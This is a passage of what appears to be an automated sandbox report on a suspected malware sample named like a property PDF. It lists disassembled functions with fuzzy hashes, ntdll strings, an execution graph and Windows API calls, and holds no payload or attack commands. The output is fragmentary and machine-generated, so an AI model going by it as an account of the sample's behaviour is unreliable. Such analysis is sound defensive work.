                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010746FC
                                                                                                                              • ExecuteOptions, xrefs: 010746A0
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01074725
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01074742
                                                                                                                              • Execute=1, xrefs: 01074713
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 819bacc7e217bb793720912b197179f187dfcf1f61f3fbb966d464d5786f8667
                                                                                                                              • Instruction ID: 0019591cc30ee6326e8eefaad7049648be94b453a9533e4092a85a10fc9f1319
                                                                                                                              • Opcode Fuzzy Hash: 819bacc7e217bb793720912b197179f187dfcf1f61f3fbb966d464d5786f8667
                                                                                                                              • Instruction Fuzzy Hash: 595127B1A0021A7AEB21AAA9DC95FEE77ACFB58300F0400E9E685A7180D7719A41DF55
                                                                                                                              Function 010D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                              • Instruction ID: eb053b5a1fb56a7d9acb4022820f72c3c37870568839aa3038b4cfb80916f5e2
                                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                              • Instruction Fuzzy Hash: 2B023470508342AFD345DF18C490AAFBBE5EFC8714F44896DFA898B264DB32E945CB42
                                                                                                                              Function 0104B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                              • Instruction ID: 444864ea913ab62c65c29d0fcf2e299bade3f1472fe2180314761ac9fc68ce11
                                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                              • Instruction Fuzzy Hash: 7F819DB0A052499FEF25DE6CC8D17FEBBE2BF49320F1841A9D8D1A7291C634D841CB51
                                                                                                                              Function 010B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 045a922e604a502aa1a08d70236d9877c4981158c7ddd0005f7e90daefe3e9f9
                                                                                                                              • Instruction ID: 82f19381892299d644da6c8115586c9f2458f7324a6c6f4cae9f35b19558e48a
                                                                                                                              • Opcode Fuzzy Hash: 045a922e604a502aa1a08d70236d9877c4981158c7ddd0005f7e90daefe3e9f9
                                                                                                                              • Instruction Fuzzy Hash: 6B2167BAA00119ABDB50DF79DC90AFF7BF8EF64640F040566ED45D3240E730E9028B91
                                                                                                                              Function 0102F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 0107031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010702E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010702BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 597fdb982df08d77e2110d4f467430789da692839e20fe2ad09d1820c14a2ae5
                                                                                                                              • Instruction ID: 2e0a9841763de1c1d3ee4013897649ef393fed487975c32dab70dc86440697e6
                                                                                                                              • Opcode Fuzzy Hash: 597fdb982df08d77e2110d4f467430789da692839e20fe2ad09d1820c14a2ae5
                                                                                                                              • Instruction Fuzzy Hash: 50E1CD70A087429FD765CF28C884B2ABBF0BB89364F144AADF5E58B2D1D774D845CB42
                                                                                                                              Function 0103BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 01077BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01077B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 01077B8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: 403d40ee8fb7160b859c034f5b5a64aa14635fa18ad2eeaed334b8582a7a7b2a
                                                                                                                              • Instruction ID: d6d7b51e3153db0b7738b30ad0f7e5eeac1d9d894b8cf4329ebe5775b9e2c78b
                                                                                                                              • Opcode Fuzzy Hash: 403d40ee8fb7160b859c034f5b5a64aa14635fa18ad2eeaed334b8582a7a7b2a
                                                                                                                              • Instruction Fuzzy Hash: 9541D4357047039FD720DE29C840B6AB7E9EF98725F100A6DFADADB680DB71E4058B91
                                                                                                                              Function 0103B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107728C
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 010772C1
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01077294
                                                                                                                              • RTL: Resource at %p, xrefs: 010772A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 0ce11e3fc747580044f7cc971c98e0ffe5722a49d07645a77a32e4a4929a1a3b
                                                                                                                              • Instruction ID: c3583994ec96adce64a2ae80b7ec4e9a6abbed408e5e6589718c175bb5a6ef24
                                                                                                                              • Opcode Fuzzy Hash: 0ce11e3fc747580044f7cc971c98e0ffe5722a49d07645a77a32e4a4929a1a3b
                                                                                                                              • Instruction Fuzzy Hash: 48410231B04202ABC721DE29CC41FAABBE5FF94754F100619F9E5EB280DB21E81287D5
                                                                                                                              Function 010B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: cf045caaeddb7705bcab055d98e1d1e514895a726bd442d9b25c2f0844ba3959
                                                                                                                              • Instruction ID: 8be7cf02e388d39059f398de9c698877cbf42e5784b381c5c34ba307118febb5
                                                                                                                              • Opcode Fuzzy Hash: cf045caaeddb7705bcab055d98e1d1e514895a726bd442d9b25c2f0844ba3959
                                                                                                                              • Instruction Fuzzy Hash: A4316672A012199FDB60DF2DCC80BEF77F8EF54650F454596E989E3240EB30EA458BA0
                                                                                                                              Function 01047D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                              • Instruction ID: 5764d725fbb2aac0514c31a424f69de09763bd80fc134afcd4f90a23012ec528
                                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                              • Instruction Fuzzy Hash: 199190F1E0021A9BEB64DF6DC8C0ABEBBF5AF44320F54867AE9D5A72C0D73099418751
                                                                                                                              Function 01009126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: b47fa9b6af634a85a07bdd2fbf74cf5478d871b5bd74a55bd5d8934f76cc8a18
                                                                                                                              • Instruction ID: d9ea53ace5a913c85aba5608c66d1b08e6401fd83f59f0afd64486018c94c5b1
                                                                                                                              • Opcode Fuzzy Hash: b47fa9b6af634a85a07bdd2fbf74cf5478d871b5bd74a55bd5d8934f76cc8a18
                                                                                                                              • Instruction Fuzzy Hash: CD811A71D012699BDB32DB54CC45BEEB7B8AB08754F0041EAEA5DB7280D7359E84CFA0

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:62
                                                                                                                              Total number of Limit Nodes:6
                                                                                                                              execution_graph 28357 11d4668 28358 11d467a 28357->28358 28360 11d4686 28358->28360 28361 11d4779 28358->28361 28362 11d479d 28361->28362 28366 11d4879 28362->28366 28370 11d4888 28362->28370 28363 11d47a7 28363->28360 28367 11d48af 28366->28367 28369 11d498c 28367->28369 28374 11d44b4 28367->28374 28369->28363 28371 11d48af 28370->28371 28372 11d498c 28371->28372 28373 11d44b4 CreateActCtxA 28371->28373 28372->28363 28373->28372 28375 11d5918 CreateActCtxA 28374->28375 28377 11d59db 28375->28377 28341 11dd690 DuplicateHandle 28342 11dd726 28341->28342 28343 11dacb0 28347 11dada8 28343->28347 28352 11dad97 28343->28352 28344 11dacbf 28348 11daddc 28347->28348 28349 11dadb9 28347->28349 28348->28344 28349->28348 28350 11dafe0 GetModuleHandleW 28349->28350 28351 11db00d 28350->28351 28351->28344 28353 11daddc 28352->28353 28354 11dadb9 28352->28354 28353->28344 28354->28353 28355 11dafe0 GetModuleHandleW 28354->28355 28356 11db00d 28355->28356 28356->28344 28378 11dd040 28379 11dd086 GetCurrentProcess 28378->28379 28381 11dd0d8 GetCurrentThread 28379->28381 28382 11dd0d1 28379->28382 28383 11dd10e 28381->28383 28384 11dd115 GetCurrentProcess 28381->28384 28382->28381 28383->28384 28385 11dd14b 28384->28385 28386 11dd173 GetCurrentThreadId 28385->28386 28387 11dd1a4 28386->28387 28388 73729c8 28389 7372a02 28388->28389 28390 7372a93 28389->28390 28391 7372a7e 28389->28391 28392 73707b0 3 API calls 28390->28392 28396 73707b0 28391->28396 28394 7372aa2 28392->28394 28397 73707bb 28396->28397 28398 7372a89 28397->28398 28401 73733d8 28397->28401 28407 73733e8 28397->28407 28402 7373402 28401->28402 28413 73707f8 28401->28413 28404 737340f 28402->28404 28405 7373427 CreateIconFromResourceEx 28402->28405 28404->28398 28406 73734b6 28405->28406 28406->28398 28408 73707f8 CreateIconFromResourceEx 28407->28408 28409 7373402 28408->28409 28410 737340f 28409->28410 28411 7373427 CreateIconFromResourceEx 28409->28411 28410->28398 28412 73734b6 28411->28412 28412->28398 28414 7373438 CreateIconFromResourceEx 28413->28414 28415 73734b6 28414->28415 28415->28402

                                                                                                                              Executed Functions

                                                                                                                              Function 011DD031 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 485 11dd031-11dd0cf GetCurrentProcess 489 11dd0d8-11dd10c GetCurrentThread 485->489 490 11dd0d1-11dd0d7 485->490 491 11dd10e-11dd114 489->491 492 11dd115-11dd149 GetCurrentProcess 489->492 490->489 491->492 494 11dd14b-11dd151 492->494 495 11dd152-11dd16d call 11dd618 492->495 494->495 498 11dd173-11dd1a2 GetCurrentThreadId 495->498 499 11dd1ab-11dd20d 498->499 500 11dd1a4-11dd1aa 498->500 500->499
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD0BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 011DD0FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD138
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 011DD191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 84ef647e38b17a823ecb28d3dc099915466b98199597eaaee411836def9d3833
                                                                                                                              • Instruction ID: dc7ee0e346107af791fc8b5ac23eb0af99479d9e3334ba0f80fd8b125fa649c4
                                                                                                                              • Opcode Fuzzy Hash: 84ef647e38b17a823ecb28d3dc099915466b98199597eaaee411836def9d3833
                                                                                                                              • Instruction Fuzzy Hash: 4F5148B090034A8FDB18CFA9D948BDEBBF5FF88318F24845AE419A73A0D7745944CB61
                                                                                                                              Function 011DD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 507 11dd040-11dd0cf GetCurrentProcess 511 11dd0d8-11dd10c GetCurrentThread 507->511 512 11dd0d1-11dd0d7 507->512 513 11dd10e-11dd114 511->513 514 11dd115-11dd149 GetCurrentProcess 511->514 512->511 513->514 516 11dd14b-11dd151 514->516 517 11dd152-11dd16d call 11dd618 514->517 516->517 520 11dd173-11dd1a2 GetCurrentThreadId 517->520 521 11dd1ab-11dd20d 520->521 522 11dd1a4-11dd1aa 520->522 522->521
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD0BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 011DD0FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD138
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 011DD191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: f0ab337f53a257e80c2755d9b2f4c166ff8b66104cbdcfcd463b7756aa6754e0
                                                                                                                              • Instruction ID: 74877c84c1c42d296bb82008f702f8bba18f6506d1b1b14c9d714647ad27ad8a
                                                                                                                              • Opcode Fuzzy Hash: f0ab337f53a257e80c2755d9b2f4c166ff8b66104cbdcfcd463b7756aa6754e0
                                                                                                                              • Instruction Fuzzy Hash: 255159B0900349CFDB18CFA9D948B9EBBF5FF48318F24845AE419A73A0D7745944CB65
                                                                                                                              Function 011DADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 595 11dada8-11dadb7 596 11dadb9-11dadc6 call 11da0cc 595->596 597 11dade3-11dade7 595->597 603 11daddc 596->603 604 11dadc8 596->604 599 11dade9-11dadf3 597->599 600 11dadfb-11dae3c 597->600 599->600 606 11dae3e-11dae46 600->606 607 11dae49-11dae57 600->607 603->597 650 11dadce call 11db030 604->650 651 11dadce call 11db040 604->651 606->607 608 11dae59-11dae5e 607->608 609 11dae7b-11dae7d 607->609 612 11dae69 608->612 613 11dae60-11dae67 call 11da0d8 608->613 611 11dae80-11dae87 609->611 610 11dadd4-11dadd6 610->603 614 11daf18-11dafd8 610->614 617 11dae89-11dae91 611->617 618 11dae94-11dae9b 611->618 615 11dae6b-11dae79 612->615 613->615 645 11dafda-11dafdd 614->645 646 11dafe0-11db00b GetModuleHandleW 614->646 615->611 617->618 621 11dae9d-11daea5 618->621 622 11daea8-11daeaa call 11da0e8 618->622 621->622 625 11daeaf-11daeb1 622->625 626 11daebe-11daec3 625->626 627 11daeb3-11daebb 625->627 628 11daec5-11daecc 626->628 629 11daee1-11daeee 626->629 627->626 628->629 631 11daece-11daede call 11da0f8 call 11da108 628->631 636 11daf11-11daf17 629->636 637 11daef0-11daf0e 629->637 631->629 637->636 645->646 647 11db00d-11db013 646->647 648 11db014-11db028 646->648 647->648 650->610 651->610
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 011DAFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: e25a5cc13ee5add12e7e96213d07670a4a5cd489c2b51c087d109b377665ecf0
                                                                                                                              • Instruction ID: 5e090e9ea67c54ac29d8bf163db78af04f6df54b72588d25a08e9d681c2c40b1
                                                                                                                              • Opcode Fuzzy Hash: e25a5cc13ee5add12e7e96213d07670a4a5cd489c2b51c087d109b377665ecf0
                                                                                                                              • Instruction Fuzzy Hash: 8B814670A00B058FDB28DF29E44479ABBF5FF88304F008A2DD58AD7A50D775E949CB91
                                                                                                                              Function 011D590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 652 11d590c-11d59d9 CreateActCtxA 654 11d59db-11d59e1 652->654 655 11d59e2-11d5a3c 652->655 654->655 662 11d5a3e-11d5a41 655->662 663 11d5a4b-11d5a4f 655->663 662->663 664 11d5a51-11d5a5d 663->664 665 11d5a60 663->665 664->665 667 11d5a61 665->667 667->667
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011D59C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: abfcafb6b0888c226cd40dfdc42855388a841ae9d3625862a2a8d176e843f935
                                                                                                                              • Instruction ID: ef95d616dac3547299218c24e1f41fd91346d73370ef84ae3b31b8a1037c5e9e
                                                                                                                              • Opcode Fuzzy Hash: abfcafb6b0888c226cd40dfdc42855388a841ae9d3625862a2a8d176e843f935
                                                                                                                              • Instruction Fuzzy Hash: 2B41CFB1C00719CFDB28CFA9C984BDEBBB6BF49314F20806AD408AB255DB756946CF51
                                                                                                                              Function 011D44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 668 11d44b4-11d59d9 CreateActCtxA 671 11d59db-11d59e1 668->671 672 11d59e2-11d5a3c 668->672 671->672 679 11d5a3e-11d5a41 672->679 680 11d5a4b-11d5a4f 672->680 679->680 681 11d5a51-11d5a5d 680->681 682 11d5a60 680->682 681->682 684 11d5a61 682->684 684->684
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011D59C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: fb7e7c414b47bb9f01074ae63b0623d6b0b143055560495e9933e74b433a4ffe
                                                                                                                              • Instruction ID: 9830ad57069c070a72a788d258c0522c7665fcc4c534606d66edfad232473a3b
                                                                                                                              • Opcode Fuzzy Hash: fb7e7c414b47bb9f01074ae63b0623d6b0b143055560495e9933e74b433a4ffe
                                                                                                                              • Instruction Fuzzy Hash: 6D41B5B0C0071DCBDB28DFA9C984B9EBBB6FF45304F20806AD408AB255DB756945CF91
                                                                                                                              Function 073733E8 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 685 73733e8-737340d call 73707f8 688 7373422-73734b4 CreateIconFromResourceEx 685->688 689 737340f-737341f 685->689 692 73734b6-73734bc 688->692 693 73734bd-73734da 688->693 692->693
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.2119767729.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_7370000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 78199b9638a5d07ed5a2564ea1978adedcf0f4bc4d5228e0dd30fee5843e6ad1
                                                                                                                              • Instruction ID: 38eb6ae8957eae512d42397c7c5d701f75a38728f22711a0591397c8d12b3105
                                                                                                                              • Opcode Fuzzy Hash: 78199b9638a5d07ed5a2564ea1978adedcf0f4bc4d5228e0dd30fee5843e6ad1
                                                                                                                              • Instruction Fuzzy Hash: FF319CB6900359DFCB11CFA9D844AEEBFF8AF09310F14805AE554A7211C335D850DFA0
                                                                                                                              Function 011DD689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 696 11dd689-11dd724 DuplicateHandle 697 11dd72d-11dd74a 696->697 698 11dd726-11dd72c 696->698 698->697
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 50e0223e87f294832cbd66b1a22ac3c62b9b833bd6a12322e5a8b22e15197186
                                                                                                                              • Instruction ID: c0810fe90c739d040cbc87df02e897d0d976a6a678bbe3ecea991ecf8d56fa94
                                                                                                                              • Opcode Fuzzy Hash: 50e0223e87f294832cbd66b1a22ac3c62b9b833bd6a12322e5a8b22e15197186
                                                                                                                              • Instruction Fuzzy Hash: 4D21E5B5D002499FDB10CFAAD584ADEBFF5FB48324F24805AE918A7350C378A955CF60
                                                                                                                              Function 011DD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 701 11dd690-11dd724 DuplicateHandle 702 11dd72d-11dd74a 701->702 703 11dd726-11dd72c 701->703 703->702
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 1724fb31a9d9cd7d59f922ede2773aade799a0665ab32fdbbad9a140eec6549f
                                                                                                                              • Instruction ID: fbdfc126d791d1ad659956848b8262ff74245add4c7f7f4ba79831af8b19da81
                                                                                                                              • Opcode Fuzzy Hash: 1724fb31a9d9cd7d59f922ede2773aade799a0665ab32fdbbad9a140eec6549f
